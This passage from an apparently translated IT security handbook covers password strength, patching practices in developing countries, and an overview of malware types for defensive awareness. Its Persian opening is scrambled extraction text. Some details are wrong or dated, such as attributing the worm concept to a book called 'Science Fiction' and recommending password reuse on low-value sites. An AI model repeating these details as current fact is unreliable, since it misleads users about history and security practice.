٦٢ ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺩﻳﺴﻚ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﺩ )ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺿﻤﻴﻤﺔ ۱ﻫﻤﻴﻦ • ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺍﺯ ﺍﻋـﺪﺍﺩ ﺗﺮﻛﻴﺒـﻲ ،ﻋﻼﻣﺘﻬـﺎﻱ ﻣﺠـﺎﺯ ﻭ ﻫﻤﭽﻨﻴﻦ ﻓﻀﺎﻫﺎﻱ ﺧﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. • ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﺪ ﻛﻪ ﺍﺯ ﻓـﻀﺎﻱ ﺧـﺎﻟﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺑـﻪ ﺷـﻜﻞ ﻳـﻚ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﺻﻠﻪﻫﺎ ﺭﺍ ﺣـﺬﻑ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺭﻣﺰ ﻣﺘﺸﻜﻞ ﺍﺯ ﻟﻐﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭼـﺴﺒﻴﺪﻩ- ﺍﻧﺪ(. • ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﻪ ﺧﺎﻃﺮ ﺑـﺴﭙﺎﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻫﻤﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭ ﭼﻨﺪﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻭ ﻓﺮﺩﻱ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﻛـﺸﻒ ﻛﻨـﺪ ،ﺍﻣﻨﻴـﺖ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺩﻳﮕــﺮ ﻛــﻪ ﺩﺭ ﺁﻧﻬــﺎ ﺍﺯ ﺭﻣــﺰ ﻋﺒــﻮﺭ ﻣــﺸﺎﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻳﺪ ﻧﻴﺰ ﺑﻪ ﺧﻄـﺮ ﺧﻮﺍﻫـﺪ ﺍﻓﺘـﺎﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﭼﻨﻴﻦ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴـﺴﺘﻤﻬﺎﻳﻲ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺣﻔﺎﻇﺖ ﺧﺎﺻﻲ ﻧﺪﺍﺭﻧﺪ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﺑـﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﻭ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ ،ﻧﻴﺎﺯﻱ ﺑـﻪ ﭘﺮﺩﺍﺧﺖ ﭘﻮﻝ ﻳﺎ ﺍﺭﺍﺋﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻧﻴـﺴﺖ ،ﺍﻣـﺎ ﺑﺮﺍﻱ ﺧﻮﺍﻧﺪﻥ ﻣﻘﺎﻻﺕ ﺑﻌﻀﻲ ﺍﺯ ﺭﻭﺯﻧﺎﻣﻪﻫﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻃﻪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻭﺍﺭﺩ ﻛﻨﻴـﺪ. ﺩﺭﻭﺍﻗﻊ ﺁﻧﻬﺎ ﻓﻘﻂ ﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺷﻤﺎ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺁﻧﻬـﺎ ﻭﺍﺭﺩ ﺷـﻮﻳﺪ؛ ﺑﻨـﺎﺑﺮ ﺍﻳــﻦ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑــﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻣﻄﺎﻟــﺐ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﺭﻣﺰ ﻋﺒـﻮﺭ ﻣـﺸﺎﺑﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ. • ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺣﺮﻭﻑ ﺭﺍ ﺑﺎ ﻋﻼﺋﻢ ﻳﺎ ﺍﺭﻗﺎﻡ ﻣـﺸﺎﺑﻪ ﻋـﻮﺽ ﻣﻲﻛﻨﻨﺪ؛ ﻣﺜ ﹰ ﻼ ﺍﺯ ﺭﻗﻢ " "1ﺑﺠـﺎﻱ ﺣـﺮﻭﻑ " "Iﻳـﺎ " ،"Lﺍﺯ ﺷﻤﺎﺭﺓ " "3ﻳﺎ ﻋﻼﻣﺖ " "#ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Eﺍﺯ ﺭﻗﻢ ""0 ﺑﺠﺎﻱ ﺣﺮﻑ " ،"Oﺍﺯ ﻋﻼﻣﺖ "@" ﺑﺠﺎﻱ ﺣـﺮﻑ " ،"Aﻭ ﺍﺯ ﺭﻗﻢ " "5ﺑﺠﺎﻱ ﺣﺮﻑ " "Sﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻨـﺪ .ﺍﻳﻨﻜـﺎﺭ ﺗﺮﻓﻨﺪ ﺧﻮﺑﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﻳـﺎﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﻳـﻚ ﻼ ﺁﺷﻨﺎﺳـﺖ .ﺍﻳـﻦ ﻣﻬﺎﺟﻢ ﺣﺮﻓﻪﺍﻱ ﺑﺎ ﺍﻳﻦ ﺣﻘـﻪﻫـﺎ ﻛـﺎﻣ ﹰ ﺣﻘﻪﻫﺎ ﻛﺎﺭ ﻭﻱ ﺭﺍ ﻛﻤﻲ ﺳﺨﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﻏﻴﺮ ﻣﻤﻜـﻦ ﻧﻤﻲﺳﺎﺯﺩ. • ﺣﺮﻑ " "Iﺭﺍ ﺑﻪ ﺟﺎﻱ ") "eyeﭼﺸﻢ( ﻳﺎ " "ayeﻳﺎ ﻫﺮ ﻛﻠﻤﺔ ﻣﻌﻨﺎﺩﺍﺭ ﺩﺭ ﺯﺑﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻋﻮﺽ ﻛﻨﻴﺪ .ﺍﻳﻨﻜﺎﺭ ﺑﺨـﺼﻮﺹ ﺑﺮﺍﻱ ﻟﻐﺎﺗﻲ ﻣﺜـﻞ " "iconﻛـﻪ ﭘـﺲ ﺍﺯ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺑـﻪ " "eyeconﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ ﻣﻔﻴﺪ ﺍﺳﺖ. ﺑﺨﺶ ﺭﺟﻮﻉ ﻛﻨﻴﺪ(. ﻗﺎﻧﻮﻥ ﺳﻮﻡ: ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺁﻧـﺮﺍ ﺑﺮﺍﺣﺘـﻲ ﺑﻪ ﺧﺎﻃﺮ ﺁﻭﺭﺩ ،ﻭﻟﻲ ﺣﺪﺱ ﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ ﺩﻳﮕـﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ. 
Because some host systems lack adequate security, attackers are sometimes able to reach the passwords of all users and obtain the encrypted passwords. Even if one-way encryption has been used for every password, an attacker may still be able to discover yours: the algorithms used to encrypt these passwords are well known, so the attacker can use them to encrypt every word in the dictionary along with other common passwords. If, for example, you have chosen the word birthday as your password, an attacker who encrypts the word birthday will notice that the encrypted result matches what is stored on disk, and from then on will know your password.

Since the whole idea of using passwords is to let you into the system whenever you wish while making the password hard for other people to guess, a number of characteristics of strong passwords can be listed. As with user names, different systems set different rules for passwords (minimum and maximum length, permitted characters, and so on).

• Never use a single word of your native language as a password. A phrase, a sentence, or pieces of several words are a better choice.
• If the system accepts both upper-case and lower-case letters in passwords, use both, but not in their correct, predictable places.
• On some systems the password must be longer than a given number of characters, or must contain a given number of letters and digits together. If you are a poor typist and someone watches you and the keyboard over your shoulder, that person will be able to work out your password.
• Never use any of the following as your password:
  o a name or a variation on one;
  o your user name or nickname;
  o the name of your spouse, or the names of your children or parents;
  o the names of friends, bosses or colleagues;
  o the names of pets;
  o your own birthday or that of a friend or relative;
  o a telephone number, a driver's license number or the number of a similar document;
  o your favorite color;
  o your position or job title;
  o the name of the organization you work for;
  o anything else you are known by;
  o classic passwords such as "Xyzzy" or "Plover" (passwords used in many computer games), and "open sesame";
  o words used in popular and well-known films, news, stories or literature, such as "Harry Potter", "Lord of the Rings" and "Gone with the Wind";
  o letters that sit next to each other on the keyboard, such as "SDFGHJ";
  o any of the above with a digit added before and after;
  o letters or digits repeated side by side or in sequence, such as "aaaa9999", "123456" or "ABCDE".
• Spelling words backwards makes them slightly obscure but does not make them hard to recognize.
• Never store an unencrypted list of passwords in files on a computer.
• Use acronyms (the first letters of the words that make up a phrase). For example, "tgbwc" is an acronym of the well-known Coca-Cola slogan ("Things Go Better With Coke").
• Whatever your password is, you must commit it to memory without writing it down. Never write a password anywhere, and never leave it at your workplace or on labels.

The best password is a random string of letters and digits, but most of us find such passwords very hard to remember. It is not at all desirable for a password to be written in a notebook or under the keyboard. Below are examples of suitable passwords for systems that accept letters, numbers, special symbols and spaces and that distinguish between lower-case and upper-case letters. These passwords are easy to remember, yet very hard to find in a dictionary or to guess.

| Password | Description |
|---|---|
| Computers Are Useful | A phrase that many computer users agree with. |
| Computers aReuseFul | A space placed at a suitable point and a humorous use of capital letters. |
| @C0mputer5 reus#fv1 | The digit "0" in place of the letter "O", "5" in place of "S", "@" in place of "a", "#" in place of "E", "V" in place of "U", and "1" in place of the letter "L"; there is no space in this example. |
| Comp9uter8sa re7usef6ul | The original phrase without spaces, with numbers placed between every 4 letters. |
| Comutrsa reusful | The original phrase with a few letters left out. |
| Onupatithwa | Many countries with a storytelling tradition have standard ways of beginning a story. In English, children's stories usually begin with "Once upon a time, there was". In this example two letters are taken from the start of each word, so that the password stays short and at the same time cannot be recognized. |
| @oNup T-1thuua | The previous phrase with the substitutions and symbols described above applied to it. |

Limit privileges

Most systems give users limited privileges, fewer than those of the system administrator. When the administrator and the user of a computer are the same person (as on many personal computers), the user does everything with full access rights (root privileges or administrator privileges), whereas it is better to use a separate user name for non-administrative work. Doing so reduces the chance of damaging the system by accident, and if an attacker breaks in it considerably reduces the harm done to the system.

Change your password

Passwords should be changed periodically, but how often is still a matter of debate. Some security specialists recommend changing your password at short intervals; others believe that this leads people to choose simple passwords or to write them down somewhere so as not to forget them. For ordinary use the following is recommended:

• If you think your password may have been stolen, change it at once.
• If for any reason you have given your password to someone else, change it quickly. Sharing passwords is not good practice and should be avoided unless there really is no alternative.
• Change your passwords periodically. "Periodically" means different things to different people; intervals of six months to a year may seem appropriate.
• If your organization's policy is more specific on this point, follow it.

Chapter 4
Operating System and Application Software Security

Overview

This chapter looks at the techniques used to make operating systems and application software less vulnerable to security intrusions.

Introduction

Principle one: computers run programs.
Principle two: programs have bugs.

The first principle is self-evident, and the second is entirely to be expected given that programmers are not flawless. It is not clear why so large a share of security problems stems from programming errors. Errors such as buffer overflows can easily be prevented while a program is being developed, and yet roughly half of all serious security problems appear to be of this kind.

Commercial software

How does a commercial software product usually work?

A few years ago, when you bought a piece of software, no updates were applied to it until a new version came onto the market. Today, for various reasons and above all because of security issues, most software is updated regularly. For some software, such as operating systems, "regular updating" means doing so daily. [30] Updating most products usually costs users nothing.

[30] In October 2003, following a serious security problem in Microsoft Windows, Microsoft concluded that it might be unrealistic and unusual to expect users to install security patches every week; since then it has released patches monthly, except when a problem is very serious and urgent.

Many companies that supply commercial software also supply updates for it to fix bugs and security vulnerabilities. To obtain the update services of the large vendors, you can usually go to their web site and find the fixes released for their products under "Support" or "Download".

When you visit the software vendor's web site, you specify the software packages and versions you use, and the site then presents a list of the updates available for download. In some cases it is quite clear that the updates offered apply to your computer; in others it is less clear. Once you have chosen the updates you want, you download them and then install them. Depending on the kind of software, the program you have downloaded may simply run in a single step, or it may require particular instructions to be followed before it installs. In some cases the update package installs itself almost automatically after it has been downloaded.

In recent years three main methods have generally been used to deliver updates:

1. For programs such as Microsoft Windows, Microsoft publishes update packages through the "Windows Update" web site. A program examines your computer and presents a list of the updates the system needs; you can then select, download and install them.
2. Sometimes the update package downloaded in this way is not the real update but a program which, when run, downloads the real update. Such a program may be only 500 kilobytes in size, which is small for a software update package; in reality it is merely a program that downloads the real update and then installs it, and the real update may be around 30 megabytes.
3. Some programs have built-in functions that dynamically check for released updates and, with the user's permission, download and install them.

These capabilities are designed to make things easier for you. In every case, the task of selecting exactly the update packages that are needed (a complicated job for a particular operating system and set of applications) is carried out automatically by programs.

The problem for developing countries

As you can see, many update processes are designed to run in an environment connected to the Internet, and they download update packages of several megabytes. This approach therefore works only if you have a high-speed Internet connection or can keep a dial-up connection open for several hours. In developing countries that is usually not possible.

There are two ways of dealing with this problem:

1. Forgo updating your applications and operating system.
2. Ask someone else to download the update package and to provide detailed installation instructions. The update package can then be distributed on compact discs or over a local network.

At a time when the likelihood of security threats is growing, the first course does not seem reasonable. The only suitable option is therefore to download patches and fixes and to share the downloaded copies.

There are several ways of doing this:

• If an organization has many machines, its technical administrator should take responsibility for downloading and installing update packages.
• Computer clubs or other groups can download update packages and make them available to their members.
• Internet service providers (ISPs) can obtain update packages for popular products and common operating systems and distribute them locally to their users. This reduces the ISPs' need for international bandwidth and so also lowers their costs.
• Computer shops can make update packages available to their customers.
• In 2003, when an Internet worm left computers vulnerable, Microsoft distributed update packages on compact discs in various countries to counter it. This method can continue to be used.

Although the last three ways of distributing update packages are not very common, the growing need to keep software up to date means they can become an effective business strategy for ISPs and vendors in developing countries. Such support strategies are welcome, but users must make sure that local sources of updates are also trustworthy. If local sources are not trustworthy, they may turn into a center for distributing viruses and Trojans.

Should update packages be installed as soon as they are released?

This question has been debated among computer specialists for several decades. There are two different points of view:

Those in favor: if you install update packages promptly, you have protected yourself against known threats. With the protection that update packages provide, you can guard against intrusion and disclosure of information as far as the system allows.

Those against: programmers may make mistakes when writing code or may break another part of the program. Update packages may also contain as many bugs and vulnerabilities as the original programs. An update package may therefore create new problems that have nothing to do with the problem it was meant to solve.

The periodic publication of newly discovered security flaws, which attackers use to break into systems and destroy data, has changed the scope of this question. When a security flaw is announced, even if the announcement takes the form of a security patch, attackers quickly produce tools to exploit it, and as a result the computers of people who do not apply the published security patches may quickly come under attack.

Practical recommendation:

• Novice users, and people whose computers are used for non-sensitive work, should apply all update packages as soon as they are released. For a computer that has not been updated, the risk of new problems introduced by update packages is far smaller than the risk from unpatched vulnerabilities.
• Professional users and technical staff should install security updates promptly but may prioritize the remaining update packages according to what they do. Delaying the installation of these packages by a few weeks or months lets adventurous users install them first, discover and report any problems, and so give the producer a chance to fix new defects before you have installed the updates.

One can never tell when a change will stop an application from running correctly. For that reason, if your computer is used for sensitive business activities, the best approach is to test the changes on a similar, less critical machine before applying new updates.

Non-traditional and non-commercial software

The preceding discussion concentrated on commercial products, namely the major operating systems and applications that are common in many computing environments. But how do things change for other software?

Small commercial software

A great deal of software is made available to the public free of charge or at minimal cost. The level of support from the vendors of such software varies widely. In general, applying free or low-cost update packages periodically is thoroughly recommended. These programs do not usually have security weaknesses; rather, they are designed to solve non-security problems or to add new features. Even so, some free software, such as firewalls and virus scanners, falls within our scope and will be discussed in this book.

If you use programs that perform security functions, make sure you understand the vendor's policy on providing updates. You certainly do not want to find yourself using security-sensitive software whose update service is suddenly discontinued, or which you can no longer afford to buy. Some software, such as virus scanners, can be far more dangerous to use without regular (daily or weekly) updates than not to use at all, because using it leads you to believe that you are adequately protected.

Open source software

Open source software that is spreading rapidly needs to be properly supported. In some cases, although the software itself is offered free of charge, the update service or support for it may have to be paid for. The free, publicly available version of Red Hat Linux is a good example of such software. Organizations that want a higher level of technical support may buy the main software package, or at least its support services. If you decide to use software that is free both to acquire and to support (as some free and open source software is), bear in mind that corrected versions may remain available only for a short time. So if you have chosen unsupported software for your operating system or important subsystems, you must update to a new version from time to time (for example every six months).

Updating open source products is considerably harder than updating products such as Microsoft Windows, but the installation instructions available for the major open source products overcome this difficulty. There is also open source software for Windows that is distributed in compiled form and uses simple installers.

As with Windows systems, the update packages and patches released for large open source systems vary with the size of those systems. Identifying local sources of these update packages, so as to cut the time needed to download them from the Internet, is very important for individual users.

One last point about open source software calls for some discussion. There is a debate between supporters of open source software and supporters of traditional proprietary software over which of these products is, in the end, more secure.

Supporters of proprietary software argue:

• Because the source code of open source products is available, intruders can easily analyze a program and identify every flaw through which the system can be penetrated.
• Because many people in different places, with no organizational ties to one another, may work on open source products, standards may be ignored and a lack of integration between components may lead to security vulnerabilities.
• Because users pay the producer for proprietary products, they follow the producer's instructions, and this keeps the quality of security provisions in proprietary software high.
• Because no identifiable party bears responsibility for open source products, security is very likely to be neglected if it does not matter to the individual developers.

Supporters of open source software argue:

• Because many people work with the source code, problems are identified by experts and quickly fixed.
• People working on proprietary products may produce well-integrated code, but if the producer attaches no particular value to the security of its product, the program cannot reach a satisfactory level of security.
• With proprietary programs, fixing a problem always means going back to the producer, and this can cause long delays.

In fact each of these arguments is valid in its place. There is no way to be certain that a piece of proprietary software or a piece of open source software is secure. Nor can it be claimed that problems which arise are, or are not, discovered and fixed in good time. Both kinds of software have produced examples of ideal behavior as well as of carelessness on the part of designers and support organizations.

Pirated software

Neither the authors nor the publishers of this book promote software piracy, but it would be naive to pretend that the problem does not exist. Software piracy occurs all over the world, but it is more common in countries where the cost of legal software relative to wages is far higher than in developed countries, where local legal authorities and police forces work together to make violations very unlikely.

Leaving aside the legal duty of those responsible to prevent infringement of the producer's ownership rights, there are two points about the security of pirated software that need to be considered. Neither is very common in pirated software, but it is nevertheless possible for both to be present together.

1. Pirated software may not be updatable, or updating it may stop it from working.
2. Some pirated software may contain functions that you do not expect. These may include backdoors, keyloggers or other kinds of malicious software.

Chapter 5
Malicious Software

Overview

This chapter examines the concept and the various kinds of malicious software (such as viruses, Internet worms and Trojans) and the mechanisms used to distribute them.

Internet worm
Worms resemble viruses in that they make copies of themselves, but they do not need a host program in order to do so. Like a virus, a worm may do nothing more than copy itself to different places, or it may carry out other operations as well. A worm works only when the system is able to accept external sources and can run programs by way of those sources. Some vendors of malware detection tools count worms as a kind of virus.

Trojan horse
This kind of software takes its name from the legend of the war for the city of Troy in Greece. In the legend, the Greeks send a large wooden horse in through the city gate, and once the horse is inside the city a large number of Greek soldiers come out of it and capture the city. Ever since, "Trojan horse" has meant something that looks ordinary but has dangerous contents. In computing, a Trojan horse can cause a great deal of damage or do things other than what the user expects. In recent years the term has been applied to malicious programs that usually enter a system without the user's knowledge or permission and collect and send out information.

Introduction

"Malicious software" is abbreviated to "malware". Such software is usually designed to harm or damage a system.
The first computer virus was identified in 1981. The concept of the computer worm was introduced in the book "Science Fiction" in 1975, and the first real worm activity dates from the early 1980s. Interestingly, worms were originally designed to do something positive and useful. Computer Trojan horses, too, go back to the earliest days of time-sharing (the 1960s). Despite the long history of such software, it is only in recent years that its destructive effects have become severe and dangerous for ordinary users.

To begin with, we need to define what these terms mean.

Virus
A virus is a program that attaches itself to the end of another program or inserts itself into the body of another program. When that program is run, the virus runs too and places copies of itself in other files or disks, thereby replicating itself; whenever one of the infected files or programs is run, the process is repeated. A virus may also do other things in addition.

"Bonus" software
Bonus software is software that contains other software packages without your knowledge. Bundling other packages with a commercial product is common practice. If you install a web browser, for example, it may come with programs such as Adobe Acrobat or multimedia software. The reason is that this usually makes the main software more useful, and the usual procedure is that the additional software is installed only if you want it, or that you are told about it when installation begins. Bonus software usually does something different from the main software, and if you have the choice you should certainly not install it.

The capabilities of Trojans, viruses and worms are not "exclusive" to one program. In other words, attackers can write malware with more than one of these characteristics, such as a self-replicating Trojan. Malware that has more than one malicious property is called a blended threat. As you can see, these labels are generally defined by the way malicious software spreads, not by what it does. This chapter examines how such software behaves and the ways in which it spreads. Later chapters discuss how to protect computers and networks against it.

Functions of malicious software

There is no limit to what malicious software can do on your computer, but the activities of these programs usually share common features:

Sending e-mail

Sending e-mail is one of the most common functions of malicious programs. The message may carry an attachment containing a virus or a worm. Its body may be written around some particular piece of information (such as a Microsoft warning about a security problem), or it may even contain a random extract from earlier e-mail messages of yours that are stored on the computer. If the attachment is a dangerous file, the text of the message usually encourages the recipient in some way to open it. The subject and sender fields are also usually set so as to encourage the user to open the attached file (as with the well-known worm whose subject was "I Love You"). Messages of this kind are usually sent to people whose addresses appear in the address book or in other files on the infected computer. Sometimes the program stops once messages have been sent to all of these people; sometimes it resumes its activity, either from the original computer or from new starting points. Bear in mind that if someone else's computer is infected with a virus or worm, and the virus puts your address in the "From" field of the infected message (perhaps because it found your address on the infected machine), it is you who will be accused of distributing the virus! (This technique is called e-mail spoofing, and when a malicious program uses it, it is not easy to establish whose computer is actually infected.)

Information gathering

Malicious software can obtain information about your computer and the files on it and pass this information to its author. Such a program can read all the files on your computer (even encrypted files). If you store bank account or credit card details on your computer, intruders may be interested in this data. If you have made an image of your signature to use when printing or sending letters, that too may be useful to attackers. Collecting these pieces of information together can make it possible for an attacker to misuse your identity. If you work for a business and store other people's credit card numbers on your computer, you will face serious problems if those numbers are stolen.

Overwriting or deleting data

Some malicious software is truly destructive: by feeding data into your computer it can quickly erase the files on the hard disk or overwrite them with incorrect information. Sometimes these programs make such changes in ways that are less likely to be detected.

Installing a Trojan

This function has become very common in malicious software. Programs are normally installed on your computer, so a malicious program can take the place of one that you or the operating system use frequently (the original meaning of Trojan). It may also introduce other programs into the system that run at a predetermined time or when the computer is switched on. Many of these techniques are described in the section on "payload software".

Scheduling for the future

Any of the functions described may take place immediately or be scheduled to happen in the future. For example, the authors of malicious software may like it to be announced that a particular worm will cause major damage in the first days of January 2000.

Payload software

Although the details differ from case to case, malicious software usually takes the form of a program that settles on your computer and runs when you switch the computer on or start a particular program. The only limit on what these programs can do is the imagination and skill of their creator.

Web tracking and modification software

Programs of this kind watch the sites you visit and can display other pages in addition to the ones you would normally see. They can also replace the content of a web site with their own advertising, and send information about your computer and about your dealings with its manufacturer to their creator. In many cases this software has complete control over your browser: it watches what you type and can change what you see, and while it is monitoring what you view it can report your activities to a predetermined destination. In Internet Explorer this capability is built in and is called a BHO [49]. Although a user can create benign and very useful BHOs, the same facility has also opened up considerable scope for applications that pay less regard to ethics.

[49] Browser Helper Object; http://msdn.microsoft.com/library/enus/dnwebgen/html/bho.asp

Backdoors

Normally you need to enter a user name and password to gain access to a computer system, although this level of security is sometimes absent on systems that are physically secure and that only particular people can log in to from the keyboard. "Backdoor" software defeats all such safeguards and gives a remote user access to your computer. It may even install safeguards of its own so that only its creator can use the system.

The remote user may have gained complete control of your system. Such software can even, if it chooses, prevent you from carrying on with your work. Your computer is then under someone else's command without your knowing it. The question that arises is why an attacker would want to take control of your system. There can be many reasons, among them that the attacker:

• has no reason other than to prove to friends that he or she can do it;
• simply wants to be destructive;
• has a personal reason for targeting you;
• wants to use your computer for other malicious activity, such as sending spam or carrying out denial-of-service (DoS) attacks on other computers; or
• wants to steal valuable information.
